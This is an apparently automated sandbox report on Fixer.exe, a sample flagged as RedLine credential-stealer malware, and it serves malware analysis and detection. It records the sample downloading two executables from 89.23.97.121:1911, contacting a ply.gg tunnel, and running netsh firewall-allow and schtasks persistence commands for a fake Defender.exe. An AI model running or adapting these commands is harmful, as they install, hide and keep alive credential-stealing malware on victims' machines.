                                                                                                                                                                                                                                          Jan 8, 2025 11:15:13.112329006 CET19114970589.23.97.121192.168.2.5
                                                                                                                                                                                                                                          Jan 8, 2025 11:15:13.112339020 CET19114970589.23.97.121192.168.2.5
                                                                                                                                                                                                                                          Jan 8, 2025 11:15:13.112350941 CET497051911192.168.2.589.23.97.121
                                                                                                                                                                                                                                          Jan 8, 2025 11:15:13.112354040 CET19114970589.23.97.121192.168.2.5
                                                                                                                                                                                                                                          Jan 8, 2025 11:15:13.112368107 CET19114970589.23.97.121192.168.2.5
                                                                                                                                                                                                                                          Jan 8, 2025 11:15:13.112385035 CET497051911192.168.2.589.23.97.121
                                                                                                                                                                                                                                          Jan 8, 2025 11:15:13.112410069 CET497051911192.168.2.589.23.97.121
                                                                                                                                                                                                                                          Jan 8, 2025 11:15:13.112441063 CET19114970589.23.97.121192.168.2.5
                                                                                                                                                                                                                                          Jan 8, 2025 11:15:13.112457037 CET19114970589.23.97.121192.168.2.5
                                                                                                                                                                                                                                          Jan 8, 2025 11:15:13.112468004 CET19114970589.23.97.121192.168.2.5
                                                                                                                                                                                                                                          Jan 8, 2025 11:15:13.112494946 CET497051911192.168.2.589.23.97.121
                                                                                                                                                                                                                                          Jan 8, 2025 11:15:13.112575054 CET19114970589.23.97.121192.168.2.5
                                                                                                                                                                                                                                          Jan 8, 2025 11:15:13.112586021 CET19114970589.23.97.121192.168.2.5
                                                                                                                                                                                                                                          Jan 8, 2025 11:15:13.112596035 CET19114970589.23.97.121192.168.2.5
                                                                                                                                                                                                                                          Jan 8, 2025 11:15:13.112616062 CET19114970589.23.97.121192.168.2.5
                                                                                                                                                                                                                                          Jan 8, 2025 11:15:13.112622976 CET497051911192.168.2.589.23.97.121
                                                                                                                                                                                                                                          Jan 8, 2025 11:15:13.112627983 CET19114970589.23.97.121192.168.2.5
                                                                                                                                                                                                                                          Jan 8, 2025 11:15:13.112641096 CET19114970589.23.97.121192.168.2.5
                                                                                                                                                                                                                                          Jan 8, 2025 11:15:13.112651110 CET19114970589.23.97.121192.168.2.5
                                                                                                                                                                                                                                          Jan 8, 2025 11:15:13.112654924 CET497051911192.168.2.589.23.97.121
                                                                                                                                                                                                                                          Jan 8, 2025 11:15:13.112663984 CET19114970589.23.97.121192.168.2.5
                                                                                                                                                                                                                                          Jan 8, 2025 11:15:13.112675905 CET19114970589.23.97.121192.168.2.5
                                                                                                                                                                                                                                          Jan 8, 2025 11:15:13.112685919 CET497051911192.168.2.589.23.97.121
                                                                                                                                                                                                                                          Jan 8, 2025 11:15:13.112701893 CET497051911192.168.2.589.23.97.121
                                                                                                                                                                                                                                          Jan 8, 2025 11:15:13.112730026 CET497051911192.168.2.589.23.97.121
                                                                                                                                                                                                                                          Jan 8, 2025 11:15:13.254803896 CET19114970589.23.97.121192.168.2.5
                                                                                                                                                                                                                                          Jan 8, 2025 11:15:13.301546097 CET497051911192.168.2.589.23.97.121
                                                                                                                                                                                                                                          Jan 8, 2025 11:15:13.309606075 CET497041112192.168.2.589.23.97.121
                                                                                                                                                                                                                                          Jan 8, 2025 11:15:13.314394951 CET11124970489.23.97.121192.168.2.5
                                                                                                                                                                                                                                          Jan 8, 2025 11:15:13.570656061 CET11124970489.23.97.121192.168.2.5
                                                                                                                                                                                                                                          Jan 8, 2025 11:15:13.571017027 CET497041112192.168.2.589.23.97.121
                                                                                                                                                                                                                                          Jan 8, 2025 11:15:13.575876951 CET11124970489.23.97.121192.168.2.5
                                                                                                                                                                                                                                          Jan 8, 2025 11:15:13.828852892 CET11124970489.23.97.121192.168.2.5
                                                                                                                                                                                                                                          Jan 8, 2025 11:15:13.872507095 CET497051911192.168.2.589.23.97.121
                                                                                                                                                                                                                                          Jan 8, 2025 11:15:13.873172998 CET497041112192.168.2.589.23.97.121
                                                                                                                                                                                                                                          Jan 8, 2025 11:15:36.105659008 CET4983261069192.168.2.5147.185.221.24
                                                                                                                                                                                                                                          Jan 8, 2025 11:15:36.110503912 CET6106949832147.185.221.24192.168.2.5
                                                                                                                                                                                                                                          Jan 8, 2025 11:15:36.110574007 CET4983261069192.168.2.5147.185.221.24
                                                                                                                                                                                                                                          Jan 8, 2025 11:15:36.255799055 CET4983261069192.168.2.5147.185.221.24
                                                                                                                                                                                                                                          Jan 8, 2025 11:15:36.260824919 CET6106949832147.185.221.24192.168.2.5
                                                                                                                                                                                                                                          Jan 8, 2025 11:15:53.272025108 CET4983261069192.168.2.5147.185.221.24
                                                                                                                                                                                                                                          Jan 8, 2025 11:16:04.702680111 CET4999161069192.168.2.5147.185.221.24
                                                                                                                                                                                                                                          Jan 8, 2025 11:16:04.707638025 CET6106949991147.185.221.24192.168.2.5
                                                                                                                                                                                                                                          Jan 8, 2025 11:16:04.707715988 CET4999161069192.168.2.5147.185.221.24
                                                                                                                                                                                                                                          Jan 8, 2025 11:16:04.714013100 CET4999161069192.168.2.5147.185.221.24
                                                                                                                                                                                                                                          Jan 8, 2025 11:16:04.718861103 CET6106949991147.185.221.24192.168.2.5
                                                                                                                                                                                                                                          Jan 8, 2025 11:16:10.320446014 CET4999161069192.168.2.5147.185.221.24
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 8, 2025 11:15:36.036041975 CET | 52243 | 53 | 192.168.2.5 | 1.1.1.1
Jan 8, 2025 11:15:36.068810940 CET | 53 | 52243 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 8, 2025 11:15:36.036041975 CET | 192.168.2.5 | 1.1.1.1 | 0x33c5 | Standard query (0) | et-seattle.gl.at.ply.gg | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 8, 2025 11:15:36.068810940 CET | 1.1.1.1 | 192.168.2.5 | 0x33c5 | No error (0) | et-seattle.gl.at.ply.gg | | 147.185.221.24 | A (IP address) | IN (0x0001) | false
                                                                                                                                                                                                                                          • 89.23.97.121:1911
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49705 | 89.23.97.121 | 1911 | 2520 | C:\Users\user\Desktop\Fixer.exe
Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 11:15:10.172950029 CET | 87 | OUT | GET /6z9uno0baqvej0me.exe HTTP/1.1
                                                                                                                                                                                                                                          Host: 89.23.97.121:1911
                                                                                                                                                                                                                                          Connection: Keep-Alive
Jan 8, 2025 11:15:10.945786953 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                          Date: Wed, 08 Jan 2025 10:15:10 GMT
Jan 8, 2025 11:15:12.558784962 CET | 58 | OUT | GET /FixerNerest.exe HTTP/1.1
                                                                                                                                                                                                                                          Host: 89.23.97.121:1911
Jan 8, 2025 11:15:12.809309006 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                          Date: Wed, 08 Jan 2025 10:15:12 GMT



                                                                                                                                                                                                                                          Target ID:0
                                                                                                                                                                                                                                          Start time:05:14:52
                                                                                                                                                                                                                                          Start date:08/01/2025
                                                                                                                                                                                                                                          Path:C:\Users\user\Desktop\Fixer.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                          Commandline:"C:\Users\user\Desktop\Fixer.exe"
                                                                                                                                                                                                                                          Imagebase:0xfd0000
                                                                                                                                                                                                                                          File size:307'712 bytes
                                                                                                                                                                                                                                          MD5 hash:2ACDA1F917022E9E8081AD69B15330C6
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000000.1999968498.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2202938412.00000000033F5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          Target ID:3
                                                                                                                                                                                                                                          Start time:05:15:11
                                                                                                                                                                                                                                          Start date:08/01/2025
                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe"
                                                                                                                                                                                                                                          Imagebase:0x1d0000
                                                                                                                                                                                                                                          File size:471'096 bytes
                                                                                                                                                                                                                                          MD5 hash:83AB0FD4D723DF8D361E8AE748A01B21
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                                                                          • Detection: 100%, Avira
                                                                                                                                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          Target ID:4
                                                                                                                                                                                                                                          Start time:05:15:12
                                                                                                                                                                                                                                          Start date:08/01/2025
                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\FixerNerest.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\FixerNerest.exe"
                                                                                                                                                                                                                                          Imagebase:0x4e0000
                                                                                                                                                                                                                                          File size:398'568 bytes
                                                                                                                                                                                                                                          MD5 hash:68A9294881810BC2CF709D03D710648D
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          Target ID:5
                                                                                                                                                                                                                                          Start time:05:15:30
                                                                                                                                                                                                                                          Start date:08/01/2025
                                                                                                                                                                                                                                          Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                                                                                                          Imagebase:0x7ff6ef0c0000
                                                                                                                                                                                                                                          File size:496'640 bytes
                                                                                                                                                                                                                                          MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          Target ID:6
                                                                                                                                                                                                                                          Start time:05:15:31
                                                                                                                                                                                                                                          Start date:08/01/2025
                                                                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:"CMD" netsh advfirewall firewall add rule name=",%MUc}<NcMKXc_" dir=in action=allow program="C:\Windows\System32\Defender.exe" enable=yes & exit
                                                                                                                                                                                                                                          Imagebase:0x7ff6597b0000
                                                                                                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                          Target ID:7
                                                                                                                                                                                                                                          Start time:05:15:31
                                                                                                                                                                                                                                          Start date:08/01/2025
                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                          Target ID:8
                                                                                                                                                                                                                                          Start time:05:15:31
                                                                                                                                                                                                                                          Start date:08/01/2025
                                                                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:"cmd" /c schtasks /create /f /sc minute /mo 1 /tn "Microsoft\WindowsAPI" /tr "C:\Windows\System32\Defender.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                          Imagebase:0x7ff6597b0000
                                                                                                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          Target ID:9
                                                                                                                                                                                                                                          Start time:05:15:31
                                                                                                                                                                                                                                          Start date:08/01/2025
                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          Target ID:10
                                                                                                                                                                                                                                          Start time:05:15:31
                                                                                                                                                                                                                                          Start date:08/01/2025
                                                                                                                                                                                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:schtasks /create /f /sc minute /mo 1 /tn "Microsoft\WindowsAPI" /tr "C:\Windows\System32\Defender.exe" /RL HIGHEST
                                                                                                                                                                                                                                          Imagebase:0x7ff66a950000
                                                                                                                                                                                                                                          File size:235'008 bytes
                                                                                                                                                                                                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          Target ID:11
                                                                                                                                                                                                                                          Start time:05:15:34
                                                                                                                                                                                                                                          Start date:08/01/2025
                                                                                                                                                                                                                                          Path:C:\Windows\System32\Defender.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\System32\Defender.exe
                                                                                                                                                                                                                                          Imagebase:0x650000
                                                                                                                                                                                                                                          File size:750'130'408 bytes
                                                                                                                                                                                                                                          MD5 hash:33E16C50B29D01391849E46A442BD547
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                                                                          • Detection: 100%, Avira
                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          Target ID:14
                                                                                                                                                                                                                                          Start time:05:15:35
                                                                                                                                                                                                                                          Start date:08/01/2025
                                                                                                                                                                                                                                          Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\WerFault.exe -u -p 1684 -s 1244
                                                                                                                                                                                                                                          Imagebase:0x7ff796ae0000
                                                                                                                                                                                                                                          File size:570'736 bytes
                                                                                                                                                                                                                                          MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          Target ID:17
                                                                                                                                                                                                                                          Start time:05:16:03
                                                                                                                                                                                                                                          Start date:08/01/2025
                                                                                                                                                                                                                                          Path:C:\Windows\System32\Defender.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\System32\Defender.exe
                                                                                                                                                                                                                                          Imagebase:0x240000
                                                                                                                                                                                                                                          File size:750'130'408 bytes
                                                                                                                                                                                                                                          MD5 hash:33E16C50B29D01391849E46A442BD547
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          Target ID:19
                                                                                                                                                                                                                                          Start time:05:16:03
                                                                                                                                                                                                                                          Start date:08/01/2025
                                                                                                                                                                                                                                          Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\WerFault.exe -u -p 4284 -s 1360
                                                                                                                                                                                                                                          Imagebase:0x7ff796ae0000
                                                                                                                                                                                                                                          File size:570'736 bytes
                                                                                                                                                                                                                                          MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                                                            Execution Coverage:7%
                                                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                            Signature Coverage:0%
                                                                                                                                                                                                                                            Total number of Nodes:38
                                                                                                                                                                                                                                            Total number of Limit Nodes:7

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 0194D136
                                                                                                                                                                                                                                            • GetCurrentThread.KERNEL32 ref: 0194D173
                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 0194D1B0
                                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 0194D209
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2202227190.0000000001940000.00000040.00000800.00020000.00000000.sdmp, Offset: 01940000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_1940000_Fixer.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Current$ProcessThread
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2063062207-0
                                                                                                                                                                                                                                            • Opcode ID: e5e027a09bb44115f9081b80630452df23b93f96a56da9251429a6eb3d23c26b
                                                                                                                                                                                                                                            • Instruction ID: 2c9eab32ba2c8e954fbfb0e1ac8bde431d534e5b5b340fa711f7166711af3197
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e5e027a09bb44115f9081b80630452df23b93f96a56da9251429a6eb3d23c26b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0E5155B49003498FDB18DFA9D548BAEBFF5FF48304F208459E909A7260DB389944CF65

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 0194D136
                                                                                                                                                                                                                                            • GetCurrentThread.KERNEL32 ref: 0194D173
                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 0194D1B0
                                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 0194D209
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2202227190.0000000001940000.00000040.00000800.00020000.00000000.sdmp, Offset: 01940000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_1940000_Fixer.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Current$ProcessThread
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2063062207-0

Control-flow Graph (graph not preserved; first block 194ae30-194ae3f)
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0194B086
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2202227190.0000000001940000.00000040.00000800.00020000.00000000.sdmp, Offset: 01940000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_1940000_Fixer.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: HandleModule
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 4139908857-0

Control-flow Graph (graph not preserved; first block 1944248-1945a01)
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CreateActCtxA.KERNEL32(?), ref: 019459F1
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2202227190.0000000001940000.00000040.00000800.00020000.00000000.sdmp, Offset: 01940000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_1940000_Fixer.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Create
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2289755597-0

Control-flow Graph (graph not preserved; first block 1945935-1945936)
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CreateActCtxA.KERNEL32(?), ref: 019459F1
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2202227190.0000000001940000.00000040.00000800.00020000.00000000.sdmp, Offset: 01940000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_1940000_Fixer.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Create
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2289755597-0

Control-flow Graph (graph not preserved; first block 194d300-194d394)
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0194D387
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2202227190.0000000001940000.00000040.00000800.00020000.00000000.sdmp, Offset: 01940000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_1940000_Fixer.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: DuplicateHandle
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3793708945-0

Control-flow Graph (graph not preserved; first block 194d2f9-194d394)
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0194D387
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2202227190.0000000001940000.00000040.00000800.00020000.00000000.sdmp, Offset: 01940000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_1940000_Fixer.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: DuplicateHandle
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3793708945-0

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            control_flow_graph 464 194b020-194b060 465 194b062-194b065 464->465 466 194b068-194b093 GetModuleHandleW 464->466 465->466 467 194b095-194b09b 466->467 468 194b09c-194b0b0 466->468 467->468
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0194B086
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2202227190.0000000001940000.00000040.00000800.00020000.00000000.sdmp, Offset: 01940000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_1940000_Fixer.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: HandleModule
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 4139908857-0
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.2191592140.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff848f20000_6z9uno0baqvej0me.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 23cda6b2cd9e442c1490b96dd828b553c3602251d04beb45be4f2ba4bc4160f1
                                                                                                                                                                                                                                            • Instruction ID: d918ce67159e7f2f90908040f4cefde1d09ec18cd4c7af3ab8bc28f7d4ebfbfe
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 23cda6b2cd9e442c1490b96dd828b553c3602251d04beb45be4f2ba4bc4160f1
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5571D430C3C8660EF769B368F4826B56180EB153A0F8540BADCAE975C3AF1E7C9551DE
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.2191592140.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff848f20000_6z9uno0baqvej0me.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: #CN_^
                                                                                                                                                                                                                                            • API String ID: 0-2341464291
                                                                                                                                                                                                                                            • Opcode ID: 49e92ebf2d05257662ed54c3cf5ddeb77555c10e4db44a30c7618b88f057ac0a
                                                                                                                                                                                                                                            • Instruction ID: c263ca8c8693a90934600cdcf4566c30bc416aff2cc1b5fc2d93e714ec4b6c45
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 49e92ebf2d05257662ed54c3cf5ddeb77555c10e4db44a30c7618b88f057ac0a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8FC17C30A1D9158FEB88F728A4657A9B7E2FF98380F6405B9E009C32C2DF2DAC418755
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.2191592140.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff848f20000_6z9uno0baqvej0me.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: _
                                                                                                                                                                                                                                            • API String ID: 0-701932520
